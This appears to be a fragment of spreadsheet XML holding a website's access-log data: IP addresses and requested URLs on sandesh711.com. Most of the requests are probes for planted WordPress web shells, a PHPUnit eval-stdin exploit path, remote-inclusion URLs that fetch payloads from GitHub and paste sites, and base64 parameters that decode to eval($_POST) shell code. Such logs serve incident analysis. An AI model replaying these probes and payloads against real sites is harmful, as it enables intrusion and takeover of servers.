  </si>
  <si>
    <t>45.81.39.198</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/Requests/Text/wp-login.php</t>
  </si>
  <si>
    <t>45.81.39.206</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/anttt/simple.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-includes/Requests/Text/wp-login.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/themes/wp-classic/inc/</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/style.php?sig=update&amp;domain=51.79.124.111</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/components/com_newsfeeds/models/indexx.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/atomlib.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/sodium_compat/lib/about.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/IXR/about.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/js/tinymce/utils/about.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/images/about.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/rest-api/about.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/dropdown.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/uploads/hanna1337.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/exs-church/template-parts/new.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-config/wp-incluides/soft/wp-widget.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/random_compat/about.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/wp-data.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/chart-builder/admin/class-chart-builder.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/Requests/Text/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/ss.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/network/network.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-good.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/LA.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/ngetes.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/upfile.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/plugin-install.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-add.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/moon.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-blog.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin.php</t>
  </si>
  <si>
    <t>172.177.46.250</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/igflsevp.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ggkepmtp.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/user/moon.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/twentyseventeen/page/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/cgi-bin/install.php</t>
  </si>
  <si>
    <t>23.101.149.146</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wpylfnxv.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ypfwgjml.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>http://www.helensblog.online/</t>
  </si>
  <si>
    <t>198.235.24.143</t>
  </si>
  <si>
    <t>68.183.232.114</t>
  </si>
  <si>
    <t>103.151.140.107</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/fotogenic/wrapper.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/core-stab/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/templates/protostar/error.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/blocks/table/int/tmpl/?p=wp-content/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/compat/embed/theme/?p=wp-content/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/hellopress/wp_filemanager.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/ninja-forms/assets/css/nf-form-block-style.css</t>
  </si>
  <si>
    <t>20.98.229.7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ytaddish.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/kheedoko.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>20.169.48.142</t>
  </si>
  <si>
    <t>45.81.39.194</t>
  </si>
  <si>
    <t>205.210.31.41</t>
  </si>
  <si>
    <t>141.98.6.73</t>
  </si>
  <si>
    <t>139.59.97.230</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/rpobm/ng.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/uploads/2022/12/core.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/background-image-cropper/ups.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-includes/Requests/about.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/content.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/revslider/includes/external/page/defaul1.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-admin/css/colors/class.api.php</t>
  </si>
  <si>
    <t>143.198.89.198</t>
  </si>
  <si>
    <t>136.243.73.36</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wpdiscuz/themes/default/style-rtl.css</t>
  </si>
  <si>
    <t>anonymousfox.co</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/upload.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/fox-index.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/wp-old-index.php?action=login&amp;pass=-1&amp;submit=</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/haders.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/config.bak.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/config.bak.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/old-index.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/fonts/css.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-1ogin_bak.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/wp-1ogin_bak.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/cindex.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/alfindex.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/ioptimization/IOptimize.php?rchk</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/db_cache.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/boom.php?x</t>
  </si>
  <si>
    <t>3.252.155.166</t>
  </si>
  <si>
    <t>http://68.178.148.82/</t>
  </si>
  <si>
    <t>157.245.197.218</t>
  </si>
  <si>
    <t>52.247.62.39</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/uiajvbct.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/alixyrvh.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>175.44.42.195</t>
  </si>
  <si>
    <t>http://tme.marihome.online/</t>
  </si>
  <si>
    <t>139.144.116.92</t>
  </si>
  <si>
    <t>205.210.31.137</t>
  </si>
  <si>
    <t>139.59.101.254</t>
  </si>
  <si>
    <t>45.81.39.20</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/shell20211028/</t>
  </si>
  <si>
    <t>175.44.42.232</t>
  </si>
  <si>
    <t>http://hgix.marihome.online/</t>
  </si>
  <si>
    <t>45.81.39.203</t>
  </si>
  <si>
    <t>144.76.62.120</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/langar.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/config.bak.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/shell20211028/</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/test.php?Ghost=send</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/fox-index.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/upload.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/mu-plugins/db-safe-mode.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/legion.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/wp-old-index.php?action=login&amp;pass=-1&amp;submit=</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/wpconfig.bak.php?act=sf</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/config.bak.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/themes/config.bak.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/config.bak.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-admin/config.bak.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/config.bak.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-includes/css/css.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-includes/fonts/css.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-1ogin_bak.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/wp-1ogin_bak.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/alfa.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/alfindex.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/ioptimization/IOptimize.php?rchk</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/db_cache.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/backup_index.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/moduless.php</t>
  </si>
  <si>
    <t>95.214.27.159</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-includes/blocks/post-title/post-title/?of=1</t>
  </si>
  <si>
    <t>20.114.67.193</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/dgomttaz.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/rjfgrvns.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>20.114.70.105</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tuoaguju.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tuybwomh.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>194.169.175.36</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/rindex.php?action=add</t>
  </si>
  <si>
    <t>https://www.bing.com</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/blocks/post-title/post-title/?of=1</t>
  </si>
  <si>
    <t>175.44.42.93</t>
  </si>
  <si>
    <t>http://www.aimeesblog.xyz/</t>
  </si>
  <si>
    <t>114.119.131.11</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/mumbai-model/</t>
  </si>
  <si>
    <t>https://cherryberry.in/3f8ycdc/cache/a6517561336b002e0aa522954427dcd7</t>
  </si>
  <si>
    <t>198.235.24.167</t>
  </si>
  <si>
    <t>45.137.203.13</t>
  </si>
  <si>
    <t>5.161.179.241</t>
  </si>
  <si>
    <t>104.210.149.177</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/yvyfoaee.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/htufwvii.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>5.161.220.121</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/test.php?Ghost=send</t>
  </si>
  <si>
    <t>45.137.203.122</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/linkpreview/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/SimplePie/Content/about.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wp-resortpack/bradly.php</t>
  </si>
  <si>
    <t>52.141.94.227</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/gmbvcbxi.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/huwefgfk.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>20.167.41.238</t>
  </si>
  <si>
    <t>70.37.59.226</t>
  </si>
  <si>
    <t>87.121.221.222</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/invoicing/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Coder.php</t>
  </si>
  <si>
    <t>114.119.130.177</t>
  </si>
  <si>
    <t>205.210.31.38</t>
  </si>
  <si>
    <t>101.68.211.2</t>
  </si>
  <si>
    <t>http://68.178.148.82:80</t>
  </si>
  <si>
    <t>149.28.220.88</t>
  </si>
  <si>
    <t>41.216.188.163</t>
  </si>
  <si>
    <t>149.28.84.21</t>
  </si>
  <si>
    <t>157.230.244.29</t>
  </si>
  <si>
    <t>34.84.210.194</t>
  </si>
  <si>
    <t>178.159.37.41</t>
  </si>
  <si>
    <t>159.65.9.158</t>
  </si>
  <si>
    <t>185.254.37.239</t>
  </si>
  <si>
    <t>139.59.123.79</t>
  </si>
  <si>
    <t>175.44.42.222</t>
  </si>
  <si>
    <t>http://www.cindyshome.store/</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/wordpress-three/miin.php</t>
  </si>
  <si>
    <t>114.119.157.234</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wordpress-three/miin.php</t>
  </si>
  <si>
    <t>194.180.48.72</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wp-daft/t62.php</t>
  </si>
  <si>
    <t>82.223.120.71</t>
  </si>
  <si>
    <t>85.217.144.38</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/rnxwaexa.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/rgognmzl.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>20.213.25.214</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/gslaakez.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/dzjpyadt.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>185.225.74.169</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/dup-installer/main.installer.php</t>
  </si>
  <si>
    <t>45.12.253.198</t>
  </si>
  <si>
    <t>43.135.172.200</t>
  </si>
  <si>
    <t>165.22.255.221</t>
  </si>
  <si>
    <t>34.85.81.72</t>
  </si>
  <si>
    <t>165.232.161.92</t>
  </si>
  <si>
    <t>175.44.42.105</t>
  </si>
  <si>
    <t>http://www.ethelsblog.online/</t>
  </si>
  <si>
    <t>82.223.4.96</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/wp-daft/t62.php</t>
  </si>
  <si>
    <t>188.166.252.42</t>
  </si>
  <si>
    <t>https://sandesh711.com/index.php</t>
  </si>
  <si>
    <t>https://sandesh711.com/stylec.php</t>
  </si>
  <si>
    <t>128.199.131.76</t>
  </si>
  <si>
    <t>128.199.132.241</t>
  </si>
  <si>
    <t>43.134.162.163</t>
  </si>
  <si>
    <t>194.87.151.61</t>
  </si>
  <si>
    <t>45.92.1.183</t>
  </si>
  <si>
    <t>134.209.108.177</t>
  </si>
  <si>
    <t>146.190.89.241</t>
  </si>
  <si>
    <t>167.71.209.191</t>
  </si>
  <si>
    <t>194.169.175.44</t>
  </si>
  <si>
    <t>5.78.85.126</t>
  </si>
  <si>
    <t>43.134.173.195</t>
  </si>
  <si>
    <t>87.121.221.51</t>
  </si>
  <si>
    <t>165.232.172.70</t>
  </si>
  <si>
    <t>205.210.31.163</t>
  </si>
  <si>
    <t>157.245.146.161</t>
  </si>
  <si>
    <t>145.239.90.112</t>
  </si>
  <si>
    <t>45.126.124.113</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/qepxagld.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/qrgawzmh.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>178.128.105.193</t>
  </si>
  <si>
    <t>45.81.39.196</t>
  </si>
  <si>
    <t>175.44.42.180</t>
  </si>
  <si>
    <t>http://www.ericshome.store/</t>
  </si>
  <si>
    <t>162.158.227.159</t>
  </si>
  <si>
    <t>172.71.202.157</t>
  </si>
  <si>
    <t>34.152.15.164</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/rindex.php?action=add</t>
  </si>
  <si>
    <t>143.198.204.175</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/updates.php</t>
  </si>
  <si>
    <t>159.223.35.72</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/toccuyrs.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ykadxorx.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>183.136.225.44</t>
  </si>
  <si>
    <t>https://68.178.148.82:443</t>
  </si>
  <si>
    <t>157.245.55.26</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Niveditha%20Gowda</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Samyuktha%20Menon&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>205.210.31.159</t>
  </si>
  <si>
    <t>104.248.146.100</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/gatewayapi/inc/a57bze8931.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//wp-content/plugins/divi-contact-extended/includes/upload.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//wp-content/plugins/gatewayapi/inc/css_js.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/formcraft/file-upload/server/php/files/a57bze8931.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//wp-content/plugins/cherry-plugin/admin/import-export/upload.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/cherry-plugin/admin/import-export/a57bze8931.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//wp-content/plugins/formcraft/file-upload/server/php/</t>
  </si>
  <si>
    <t>https://sandesh711.com//wp-content/plugins/wp-engine-module/wp-engine.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wp-engine-module/a57bze8931.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/ioptimizations/a57bze8931.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//wp-content/plugins/ioptimization/IOptimize.php?rchk</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/ioptimization/a57bze8931.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//wp-content/plugins/dzs-zoomsounds/savepng.php?location=a57bze8931.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/dzs-zoomsounds/a57bze8931.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//wp-content/plugins/ioptimizations/IOptimizes.php?hamlorszd</t>
  </si>
  <si>
    <t>185.207.35.138</t>
  </si>
  <si>
    <t>45.92.1.158</t>
  </si>
  <si>
    <t>129.226.201.244</t>
  </si>
  <si>
    <t>https://www.sandesh711.com//wp-admin/css/colors/blue/blue.php?wall=ZWNobyBhRHJpdjQ7ZXZhbCgkX1BPU1RbJ3Z6J10pOw==</t>
  </si>
  <si>
    <t>43.156.147.238</t>
  </si>
  <si>
    <t>45.92.1.155</t>
  </si>
  <si>
    <t>93.90.200.43</t>
  </si>
  <si>
    <t>136.226.253.25</t>
  </si>
  <si>
    <t>https://search.google.com/</t>
  </si>
  <si>
    <t>128.199.72.245</t>
  </si>
  <si>
    <t>175.44.42.3</t>
  </si>
  <si>
    <t>http://www.blancablog.online/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Bhumi%20Pednekar</t>
  </si>
  <si>
    <t>5.161.76.182</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/rindex.php?action=add&amp;parameter=wwmclgiqhf.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Feesxg%2Fraw</t>
  </si>
  <si>
    <t>5.161.52.199</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/rindex.php?action=add&amp;parameter=hpujzjcrhq.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Feesxg%2Fraw</t>
  </si>
  <si>
    <t>45.138.16.92</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/updates.php</t>
  </si>
  <si>
    <t>20.219.188.145</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/bpnxegpg.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/qvhchekx.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>5.161.91.175</t>
  </si>
  <si>
    <t>51.91.101.73</t>
  </si>
  <si>
    <t>68.183.239.250</t>
  </si>
  <si>
    <t>43.133.60.96</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/kouonuuw.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/puxzamgr.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Suriya%20Praba</t>
  </si>
  <si>
    <t>178.128.116.255</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/blue/blue.php?wall=CiAgJGZjID0gJ1lVUnlhWFkwTFZCeWFYWTRJRlJQVDB3OFAzQm9jQ0JsWTJodklDYzhjSEpsUGljdWNHaHdYM1Z1WVcxbEtDa3VJbHh1SWk0blBHSnlMejQ4Wm05eWJTQnRaWFJvYjJROUluQnZjM1FpSUdWdVkzUjVjR1U5SW0xMWJIUnBjR0Z5ZEM5bWIzSnRMV1JoZEdFaVBqeHBibkIxZENCMGVYQmxQU0ptYV</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/rgibkxuq.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ursjlavj.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/repeater.php</t>
  </si>
  <si>
    <t>188.166.217.64</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.seo.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ee.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/sodium_compat/src/Core/Curve25519/Ge/wp_blog.php</t>
  </si>
  <si>
    <t>45.80.158.251</t>
  </si>
  <si>
    <t>159.223.75.149</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/blue/blue.php?wall=ZWNobyBDaGluYWZhbnM7ZXZhbCgkX1BPU1RbJ3h4J10pOw==</t>
  </si>
  <si>
    <t>175.44.42.111</t>
  </si>
  <si>
    <t>http://www.britneyblog.online/</t>
  </si>
  <si>
    <t>49.43.251.249</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Dimple%20Jain%201511&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/column/miin.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Juhi%20Kritika&amp;date=2023-04-14</t>
  </si>
  <si>
    <t>83.110.97.195</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2022/</t>
  </si>
  <si>
    <t>205.210.31.132</t>
  </si>
  <si>
    <t>87.121.221.50</t>
  </si>
  <si>
    <t>106.196.30.86</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/xl2023x.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.wp-hemes.php</t>
  </si>
  <si>
    <t>143.198.88.115</t>
  </si>
  <si>
    <t>178.128.95.169</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/owfsmac/maro.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/aryabot/mar.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/aryabot/mari.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/mari.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/mari.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/maint/mari.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/maro.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/owfsmac/mar.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/mari.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/maro.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/coffee/marijuana.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/coffee/mari.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/marijuana.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/m4r1ju4n4.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/images/mar.php</t>
  </si>
  <si>
    <t>45.92.1.148</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/dzrupgtz.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>103.183.229.209</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/popular-instagram-celebrities-part-1-%E0%B2%9C%E0%B2%A8%E0%B2%AA%E0%B3%8D%E0%B2%B0%E0%B2%BF%E0%B2%AF-instagram-%E0%B2%B8%E0%B3%86%E0%B2%B2%E0%B3%86%E0%B2%AC%E0%B3%8D%E0%B2%B0%E0%B2%BF%E0%B2%9F/</t>
  </si>
  <si>
    <t>42.105.224.24</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Sruthy%20Renjith%20Vaiga</t>
  </si>
  <si>
    <t>198.235.24.164</t>
  </si>
  <si>
    <t>78.138.31.29</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/vakznrze.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/dxcpcmnb.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>20.51.141.38</t>
  </si>
  <si>
    <t>134.102.132.237</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/uorfi7i/</t>
  </si>
  <si>
    <t>https://www.google.de/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Sreenidhi%20Swaminathan&amp;date=2023-04-14</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Nehal%20Vadoliya</t>
  </si>
  <si>
    <t>103.148.20.144</t>
  </si>
  <si>
    <t>117.216.133.223</t>
  </si>
  <si>
    <t>194.87.151.73</t>
  </si>
  <si>
    <t>175.44.42.123</t>
  </si>
  <si>
    <t>http://www.figensahin.com/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/ioptimization/uubxvqtujn.php?x=ooo</t>
  </si>
  <si>
    <t>https://sandesh711.com/wp-content/plugins/ioptimization/IOptimize.php?rchk</t>
  </si>
  <si>
    <t>143.198.222.57</t>
  </si>
  <si>
    <t>128.140.55.165</t>
  </si>
  <si>
    <t>91.107.196.36</t>
  </si>
  <si>
    <t>128.140.14.68</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/rindex.php?action=add&amp;parameter=hhsomjedax.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Fmhcmm%2Fraw</t>
  </si>
  <si>
    <t>103.211.60.201</t>
  </si>
  <si>
    <t>106.194.248.107</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Ranjani%20Ramesh</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/bigg-boss-ott/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Thejaswini%20Sharma</t>
  </si>
  <si>
    <t>183.82.207.7</t>
  </si>
  <si>
    <t>165.232.168.48</t>
  </si>
  <si>
    <t>115.98.234.244</t>
  </si>
  <si>
    <t>113.30.218.42</t>
  </si>
  <si>
